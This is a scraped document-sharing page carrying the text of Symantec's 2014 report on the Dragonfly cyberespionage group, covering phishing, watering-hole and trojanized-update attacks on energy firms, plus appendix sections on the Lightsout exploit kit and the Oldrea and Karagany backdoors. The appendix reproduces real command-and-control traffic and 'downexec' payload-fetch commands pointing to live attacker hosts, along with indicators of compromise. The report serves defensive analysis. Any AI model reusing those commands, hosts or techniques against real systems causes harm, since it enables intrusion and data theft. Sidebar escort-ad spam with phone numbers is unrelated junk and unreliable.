Cloudifying threats-understanding-cloud-app-attacks-and-defenses joa-eng_0118
Cloudifying threats-understanding-cloud-app-attacks-and-defenses joa-eng_0118Cloudifying threats-understanding-cloud-app-attacks-and-defenses joa-eng_0118
Cloudifying threats-understanding-cloud-app-attacks-and-defenses joa-eng_0118
 
Sophos security-threat-report-2014-na
Sophos security-threat-report-2014-naSophos security-threat-report-2014-na
Sophos security-threat-report-2014-na
 
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” World
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” WorldTrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” World
TrendLabs 2012 Annual Security Roundup: Evolved Threats in a “Post-PC” World
 
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docx
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docxREADING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docx
READING HEAD GROUP 2 BLACK ENERGYGroup 2 Black Energy.docx
 
Mobile threat report_q3_2013
Mobile threat report_q3_2013Mobile threat report_q3_2013
Mobile threat report_q3_2013
 
APT - Project
APT - Project APT - Project
APT - Project
 
Turning the Tables on Cyber Attacks
Turning the Tables on Cyber AttacksTurning the Tables on Cyber Attacks
Turning the Tables on Cyber Attacks
 
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROID
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROIDHONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROID
HONEYPOTLABSAC: A VIRTUAL HONEYPOT FRAMEWORK FOR ANDROID
 
CTI Report
CTI ReportCTI Report
CTI Report
 
IBM X Force threat intelligence quarterly 1Q 2014
IBM X Force threat intelligence quarterly 1Q 2014IBM X Force threat intelligence quarterly 1Q 2014
IBM X Force threat intelligence quarterly 1Q 2014
 
Ransomware- A reality check (Part 1).pptx
Ransomware- A reality check (Part 1).pptxRansomware- A reality check (Part 1).pptx
Ransomware- A reality check (Part 1).pptx
 
Websense security prediction 2014
Websense   security prediction 2014Websense   security prediction 2014
Websense security prediction 2014
 

Mais de Sumutiu Marius (7)

Stratfor Forensic Hack Investigation - Verizon
Stratfor Forensic Hack Investigation - VerizonStratfor Forensic Hack Investigation - Verizon
Stratfor Forensic Hack Investigation - Verizon
 
The Dark Arts of Hacking.
The Dark Arts of Hacking.The Dark Arts of Hacking.
The Dark Arts of Hacking.
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
 
Hacking Web Aplications using Cookie Poisoning
Hacking Web Aplications using Cookie PoisoningHacking Web Aplications using Cookie Poisoning
Hacking Web Aplications using Cookie Poisoning
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
 
Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.Design and Implementation of Shellcodes.
Design and Implementation of Shellcodes.
 

Último

Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
imonikaupta
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
@Chandigarh #call #Girls 9053900678 @Call #Girls in @Punjab 9053900678
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 

Último (20)

GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated  Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated  Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
 
Al Barsha Night Partner +0567686026 Call Girls Dubai
Al Barsha Night Partner +0567686026 Call Girls  DubaiAl Barsha Night Partner +0567686026 Call Girls  Dubai
Al Barsha Night Partner +0567686026 Call Girls Dubai
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298  )#  Call Girls in DubaiRussian Call Girls in %(+971524965298  )#  Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 

Dragonfly: Cyberespionage Attacks Against Energy Suppliers

  • 1. SECURITY RESPONSE Dragonfly initially targeted defense and aviation companies in the US and Canada before shifting its focus to US and European energy firms in early 2013. Dragonfly: Cyberespionage Attacks Against Energy Suppliers Symantec Security Response Version 1.21: July 7, 2014, 12:00 GMT
  • 2. CONTENTS OVERVIEW...................................................................... 3 Timeline.......................................................................... 5 Victims........................................................................... 5 Tools and tactics............................................................ 6 Spam campaign........................................................ 6 Watering hole attacks.............................................. 6 Trojanized software.................................................. 7 Source time zone........................................................... 7 Conclusion...................................................................... 8 Appendix - Technical Description................................ 10 Lightsout exploit kit............................................... 10 Backdoor.Oldrea..................................................... 11 Registry modifications........................................... 11 Trojan.Karagany..................................................... 13 Indicators of compromise............................................ 15 Lightsout exploit kit .............................................. 15 Backdoor.Oldrea .................................................... 16 Trojan.Karagany ..................................................... 17
  • 3. A cyberespionage campaign against a range of targets, mainly in the energy sector, gave attackers the ability to mount sabotage operations against their victims. The attackers, known to Symantec as Dragonfly, managed to compromise a number of strategically important organizations for spying purposes and, if they had used the sabotage capabilities open to them, could have caused damage or disruption to the energy supply in the affected countries. The Dragonfly group, which is also known by other vendors as Energetic Bear, are a capable group who are evolving over time and targeting primarily the energy sector and related industries. They have been in operation since at least 2011 but may have been active even longer than that. Dragonfly initially targeted defense and aviation companies in the US and Canada before shifting its focus to US and European energy firms in early 2013. More recent targets have included companies related to industrial control systems. Dragonfly has used spam email campaigns and watering hole attacks to infect targeted organizations. The group has used two main malware tools: Trojan.Karagany and Backdoor.Oldrea. The latter appears to be a custom piece of malware, either written by or for the attackers. OVERVIEW
  • 4. A newer approach used by the attackers involves compromising the update site for several industrial control system (ICS) software producers. TIMELINE
  • 5. Page 5 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Timeline Symantec observed spear phishing attempts in the form of emails with PDF attachments from February 2013 to June 2013. The email topics were related to office administration issues such as dealing with an account or problems with a delivery. Identified targets of this campaign were mainly US and UK organizations within the energy sector. In May 2013, the attackers began to use the Lightsout exploit kit as an attack vector, redirecting targets from various websites. The use of the Lightsout exploit kit has continued to date, albeit intermittently. The exploit kit has been upgraded over time with obfuscation techniques. The updated version of Lightsout became known as the Hello exploit kit. A newer approach used by the attackers involves compromising the update site for several industrial control system (ICS) software producers. They then bundle Backdoor.Oldrea with a legitimate update of the affected software. To date, three ICS software producers are known to have been compromised. The Dragonfly attackers used hacked websites to host command-and-control (C&C) software. Compromised websites appear to consistently use some form of content management system. Victims The current targets of the Dragonfly group, based on compromised websites and hijacked software updates, are the energy sector and industrial control systems, particularly those based in Europe. While the majority of victims are located in the US, these appear to mostly be collateral damage. That is, many of these computers were likely infected either through watering hole attacks or update hijacks and are of no interest to the attacker. By examining victims with active infections – where additional malicious activity has been detected – it is possible to gather a more accurate picture of ‘true’ victims. The most active infections, as in Figure 2, are Figure 1. Timeline of Dragonfly operations Figure 2. Top 10 countries by active infection
  • 6. Page 6 Dragonfly: Cyberespionage Attacks Against Energy Suppliers in Spain, followed in order by the US, France, Italy, and Germany. Tools and tactics Dragonfly uses two main pieces of malware in its attacks. Both are Remote Access Tool (RAT) type malware which provide the attackers with access and control of compromised computers. Dragonfly’s favored malware tool is Backdoor.Oldrea, which is also known as Havex or the Energetic Bear RAT. Oldrea acts as a back door for the attackers on to the victim’s computer, allowing them to extract data and install further malware. Oldrea appears to be custom malware, either written by the group itself or created for it. This provides some indication of the capabilities and resources behind the Dragonfly group. The second main tool used by Dragonfly is Trojan.Karagany. Unlike Oldrea, Karagany was available on the underground market. The source code for version 1 of Karagany was leaked in 2010. Symantec believes that Dragonfly may have taken this source code and modified for its own use. Symantec found that the majority of computers compromised by the attackers were infected with Oldrea. Karagany was only used in around 5 percent of infections. The two pieces of malware are similar in functionality and what prompts the attackers to choose one tool over another remains unknown. Spam campaign The Dragonfly group has used at least three infection tactics against targets in the energy sector. The earliest method was an email spear phishing campaign, which saw selected executives and senior employees in target companies receive emails containing a malicious PDF attachment. Infected emails had one of two subject lines: “The account” or “Settlement of delivery problem”. All of the emails were from a single Gmail address. Figure 3 displays the number of different recipients per day. The spam campaign began in February 2013 and continued into June 2013. Symantec identified seven different organizations targeted in this campaign. At least one organization was attacked intermittently for a period of 84 days. Watering hole attacks In June 2013, the attackers shifted their focus to watering hole attacks. They compromised a number of energy- related websites and injected an iframe into each of them. This iframe then redirected visitors to another compromised legitimate website hosting the Lightsout exploit kit. This in turn exploited either Java or Internet Explorer in order to drop Oldrea or Karagany on the victim’s computer. The fact that the attackers compromised multiple legitimate websites for each stage of the operation is further evidence that the group has strong technical capabilities. Figure 3. Spam campaign activity from mid-February 2014 to mid-June 2013
  • 7. Page 7 Dragonfly: Cyberespionage Attacks Against Energy Suppliers In September 2013, Dragonfly began using a new version of this exploit kit, known as the Hello exploit kit. The landing page for this kit contains JavaScript which fingerprints the system, identifying installed browser plugins. The victim is then redirected to a URL which in turn determines the best exploit to use based on the information collected. Figure 4 shows the compromised websites categorized into their respective industries. Fifty percent of identified targets were energy industry related and thirty percent were energy control systems, as shown in Figure 4. A clear shift in the attackers targeting can be seen in March 2014 when energy control systems become the primary target. Trojanized software The most ambitious attack vector used by Dragonfly was the compromise of a number of legitimate software packages. Three different ICS equipment providers were targeted and malware was inserted into the software bundles they had made available for download on their websites. Source time zone Analysis of the compilation timestamps on the malware used by the attackers indicate that the group mostly worked between Monday and Friday, with activity mainly concentrated in a nine-hour period that corresponded to a 9am to 6pm working day in the UTC +4 time zone. Figure 5. Number of samples compiled per hour, UTC time zone Figure 4. Targeted industries over time
  • 8. Page 8 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Conclusion The Dragonfly group is technically adept and able to think strategically. Given the size of some of its targets, the group found a “soft underbelly” by compromising their suppliers, which are invariably smaller, less protected companies. Figure 6. Number of samples compiled per day, UTC time zone
  • 10. Page 10 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Appendix - Technical Description Identification of this group is based on the use of two malware families and an exploit kit. The malware families utilized are Backdoor.Oldrea and Trojan.Karagany. The exploit kit is known as Lightsout and/or Hello. Hello is an updated iteration of Lightsout that the Dragonfly group began to use in September 2013. Use of Backdoor.Oldrea appears to be limited to the Dragonfly group. In addition, specific instances of Trojan. Karagany have been used by this group. Karagany is a Russian RAT sold on underground forums. Instances of this malware related to the Dragonfly group are identified based on them being delivered through the Lightsout exploit kit and also a particular packer that this group used. Symantec detects the Trojan.Karagany packer used by this group as Trojan.Karagany!gen1. The Lightsout exploit kit is a simple exploit kit that is consistently used to deliver primarily Backdoor.Oldrea and, in several instances, Trojan.Karagany. Lightsout exploit kit A number of sites that use content management systems were exploited and an iframe was used in order to redirect visitors to sites hosting the Lightsout exploit kit. An example of an injected iframe can be seen in figure 7. The exploit kit uses browser (e.g. Internet Explorer and Firefox) and Java exploits in order to deliver either Backdoor.Oldrea or Trojan.Karagany. An example of the structure of the Lightsout exploit kit can be seen Table 1. Note that file names and exploits used may vary. In September 2013, the Dragonfly group began using a new version of Lightsout, also known as the Hello exploit kit. The JavaScript included in the landing page redirects the browser to a URL that depends on the fonts installed on the system, browser add-ons, the OS version, and the user agent. At this point, it determines the best exploit to use, based on the information provided, and generates an appropriate URL to redirect the user to the appropriate exploit/payload. The following shows an example of such a request: [http://]compromised.example/wp-includes/pomo/ dtsrc.php?a=[EK _ DETERMINED _ PARAMETER] Figure 7. Example of injected iframe link Table 1. Examples of file names for one implementation of the Lightsout exploit kit Page Description CVE Inden2i.php First landing page N/A Inden2i.html Second landing page N/A PluginDetect.js PluginDetect script N/A Stoh.html Java 6 exploit Jar request file N/A Stoh.jar Java 6 Exploit CVE-2012-1723 Gami.html Java 7 exploit Jar request file N/A Gami.jar Java 7 exploit CVE-2013-2465 Tubc.html IE7 Exploit CVE-2012-4792 Negc.html IE8 Exploit CVE-2013-1347
  • 11. Page 11 Dragonfly: Cyberespionage Attacks Against Energy Suppliers [EK_DETERMINED_PARAMETER] may be anything listed in Table 2. The parameters dwe and dwd relate to which payload is requested for download, for example: • When a Backdoor.Oldrea payload is requested [EK_DETERMINED_PARAMETER] is dwd • When a Karagany!gen1 payload is requested [EK_DETERMINED_PARAMETER] is dwe The values of the [EK_DETERMINED_PARAMETER] variable may relate to the two different file types represented by Backdoor.Oldrea and Trojan. Karagany!gen1 payloads. Oldrea payloads are DLL files (URLs end in “d” for DLL?) while Karagany!gen1 payloads are portable executables (URLs end in “e” for EXE?). Backdoor.Oldrea At the core of Backdoor.Oldrea is a persistent component that interacts with C&C servers to download and execute payloads. The components are downloaded by reaching out to the C&C server and performing a GET request which returns an HTML page containing a base64 encoded string between two comments marked with the ‘havex’ string. Installation File system modifications • %Temp%qln.dbx • %System%TMPprovider038.dll Registry modifications In this specific example, the ‘038’ in the file name indicates the major version number. • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”TmProvider” • HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindowsCurrentVersionRun”TmProvider” • HKEY_LOCAL_MACHINE SOFTWAREMicrosoftInternet ExplorerInternetRegistry”fertger” • HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerInternetRegistry Code injection • Backdoor.Oldrea injects code into explorer.exe. Networking Post infection, Backdoor.Oldrea will attempt to collect system information such as OS, user name, computer name, country, language, nation, Internet adapter configuration information, available drives, default browser, running processes, desktop file list, My Documents, Internet history, program files, and root of available drives. It also collects data from Outlook (address book) and ICS related software configuration files. This data is collected and written to a temporary file in an encrypted form before it is POST’ed to a remote C&C server. The following are examples of a POST request and a POST response: Table 2. Lightsout exploit kit parameters Page Description H2 Java Exploit (<v1.7.17) H3 Chrome /w Java (<1.7.17) H4 IE6 & OSVer < Vista – 6 H5 Java Exploit (<v1.7.17 & OSver < Vista) H6 IE8 & OSVer < Vista H7 Java Exploit (<=v1.6.32) R2 Malicious JAR file R7 Malicious JAR file Dwe Malicious PE file Dwd Malicious PE file
  • 12. Page 12 Dragonfly: Cyberespionage Attacks Against Energy Suppliers POST request example: POST /wp08/wp-includes/dtcla.php?id=285745296322896178920098FD80-20&v1=038&v2=17 0393861&q=5265882854508EFCF958F979E4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19 Host: toons.freesexycomics.com Content-Length: 0 Cache-Control: no-cache POST response example: HTTP/1.1 200 OK Date: Wed, 22 Jan 2014 13:40:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Server: Apache/1.3.37 (Unix) Cache-Control: no-cache 9f65 <html><head><mega http-equiv=’CACHE-CONTROL’ content=’NO-CACHE’></ head><body>No data!<!--havexQlpoOTFBWSZTWWYvDI0BOsD//////////////////////////////////// /////////4oB+93VVXu69DuN7XYzds9yt49Ques [...TRUNCATED FOR READABILITY] +yUW3zfTxWAOstsCwCckdW5 AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD M92D/8XckU4UJBmLwyNA==havex--></body></head> Various samples process the C&C responses differently. In one example, the sample searches for the data enclosed by the tag ‘havex’. Once the data is found, it is decoded using standard base64 + bzip2 and also a xor layer with bytes from the string 1312312. The decoded data contains a small header followed by an executable MZ-file. Another sample was found to use standard base64 + reverse xor + RSA-2048 for decrypting received data. The decrypted data consists of a 6 byte command concatenated with an MZ file. The MZ file is compressed with the lzma algorithm. RSA keys for decryption, together with other initial configuration information, are stored in the registry in base64 form. Payloads This section includes information about identified payloads downloaded by Backdoor.Oldrea. The following is a brief description of the functionality for each identified component: • Tmpprovider is a persistent component that interacts with the C&C server (downloads and executes payloads). • The InstallerFormDll component usually embeds another executable (DLL) in its resource section to be loaded. The sample analyzed carried a Web browser password recovery tool originating from http://securityxploded.com/browser-password-decryptor.php • The RunExeCmdSingle component is a DLL file that drops and executes another executable. The export ‘runDll’ of this file is where the logic is implemented. • DropCommandsCmd is a cleanup module, used to remove traces of itself from the infected computer. • The GetFileCmd modules check for the existence of specific files on the infected host. The two samples look for the ICS related software file and Outlook’s autocomplete address book file (outlook.nk2).
  • 13. Page 13 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Trojan.Karagany Trojan.Karagany is a back door used primarily for recon. It is designed to download and install additional files and exfiltrate data. Samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer/protector for the payload. Where present in samples, the Delphi packer is configured to use ‘neosphere’ as a key to decrypt the payload. The following is a brief overview of the functionality of Trojan.Karagany: • Can upload, download, and execute files on the system • Has plugin capability (may load several plugins for added functionality, such as Web injects) • Payload is approximately 72Kb in size and is programmed in C/C++ • Contains a small embedded DLL file, which monitors WSASend and send APIs for capturing ‘Basic Authentication’ credentials Installation Trojan.Karagany creates a folder in the user APPDATA directory and chooses the directory name from the following list: • Microsoft WCF services • Broker services • Flash Utilities • Media Center Programs • Policy Definitions • Microsoft Web Tools • Reference Assemblies • Analysis Services • InstallShield Information • IIS SQL Server • Diagnostics • NTAPI Performance • WPF Platform It copies itself in the created directory with hidden and system attributes using a file name chosen from the following list: • SearchIndexer.exe • ImeBroker.exe • fsutil.exe • PnPutil.exe • BdeUISrv.exe • WinSAT.exe • pwNative.exe • SnippingTool.exe • DFDWizard.exe • PrintBrmEngine.exe • WbemMonitor.exe • dxpserver.exe • PowerMng.exe
  • 14. Page 14 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Trojan.Karagany copies itself with hidden and system attributes where it was first executed as err.log[DIGITS]. It then copies the legitimate chkdsk utility in the installation folder using the payload file name but with a space before the file extension. This may fool ordinary users into thinking that this folder contains a legitimate application, for example PnPutil .exe. Trojan.Karagany!gen1 may create the following additional files in the installation folder: • Form.api • inact.api • prog.cer • Cent.api • ie.pdb It then creates a C:ProgramDataMailMailAggl directory as a temporary directory used for uploading files. Trojan.Karagany then creates a link to itself in the Startup folder as an autostart when the system restarts. Networking Trojan.Karagany first checks for a live Internet connection by visiting Microsoft or Adobe websites. It will only reach out to its C&C server once this check is successful. Example HTTP Requests Internet connection test to Microsoft GET /en-us/default.aspx HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Host: microsoft.com Cookie: MC1=V=3&GUID=<32 character guid> Connection: Keep-Alive Cache-control: no-cache Internet connection test to Adobe using identifiant parameter POST /geo/productid.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: adobe.com ... identifiant=51032 _ 175129256364 Example POST request for C&C server check-in POST /check _ value.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR 2.0.50727) Host: 93.188.161.235 ... identifiant=51032 _ 1799883375637&version=i2pver HTTP response example HTTP/1.1 200 OK Date: Tue, 28 Jan 2014 05:59:58 GMT Vary: Accept-Encoding Content-Length: 324 Content-Type: text/html X-Powered-By: PHP/5.3.10-1ubuntu3.9 Via: 1.1 host.alexsieff.com work:3|downexec [http://]93.188.161.235/check2/muees27jxt/shot.jpg; work:5|downexec [http://]93.188.161.235/check2/muees27jxt/tl.jpg; work:7|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg; work:103|downexec [http://]93.188.161.235/check2/muees27jxt/pdump.jpg; work:118|downexec [http://]93.188.161.235/check2/muees27jxt/fl.jpg;
  • 15. Page 15 Dragonfly: Cyberespionage Attacks Against Energy Suppliers The POST data contains the operating system version and a derived number: • identifiant=[OS VERSION]_[DERIVED NUMBER] User-Agent tokens used in C&C requests are hard-coded. The following two examples have been observed: • Mozilla/17.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729) • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; .NET CLR 2.0.50727; .NET CLR 3.5.30729) Downloaded components • pdump.jpg - Used for dumping passwords into ProgramDataMailMailAgpwds.txt. Needs ‘vaultcli.dll’ library • fl.txt - Used for listing RTF, PST, DOC, XLS, PDF, *pass*.*, *secret*.* files into ProgramDataMailMailAgfls.txt • tl.jpg - Used to list running task using ‘tasklist’ utility • shot.jpg - Used for desktop screenshot, file is saved into ProgramDataMailMailAgshot.png Indicators of compromise Lightsout exploit kit Watering holes Table 3. Detected exploit sites hosting the Lightsout exploit kit and referrer Infected website Infected website industry Infected website nationality Exploit site Last Seen www.s[REDACTED]e.az File hosting service Azerbaijan blog.olioboard.com 18/06/2014 01:19 www.t[REDACTED]e.no Energy control systems Norwegian www.manshur.ir 24/05/2014 10:53 www.s[REDACTED]e.az File hosting service Azerbaijan realstars.ir 06/05/2014 22:20 s[REDACTED]e.az File hosting service Azerbaijan realstars.ir 06/05/2014 23:30 www.f[REDACTED]y.com Energy American aptguide.3dtour.com 11/04/2014 12:26 www.t[REDACTED]e.no Energy control systems Norwegian seductionservice.com 07/04/2014 06:42 www.a[REDACTED]t.it Energy control systems Italian seductionservice.com 06/04/2014 22:25 www.e[REDACTED]t.it Energy control systems Italian seductionservice.com 05/04/2014 22:57 b[REDACTED]n.in Energy control systems Indian mahsms.ir 23/03/2014 23:01 www.v[REDACTED]z.com Energy French mahsms.ir 21/03/2014 22:30 www.r[REDACTED]e.fr Energy French mahsms.ir 14/03/2014 04:30 www.e[REDACTED]m.eu Energy French aptguide.3dtour.com 04/03/2014 21:27 www.r[REDACTED]e.fr Energy French keeleux.com 30/11/2013 06:57 www.v[REDACTED]z.com Energy French keeleux.com 11/10/2013 12:18
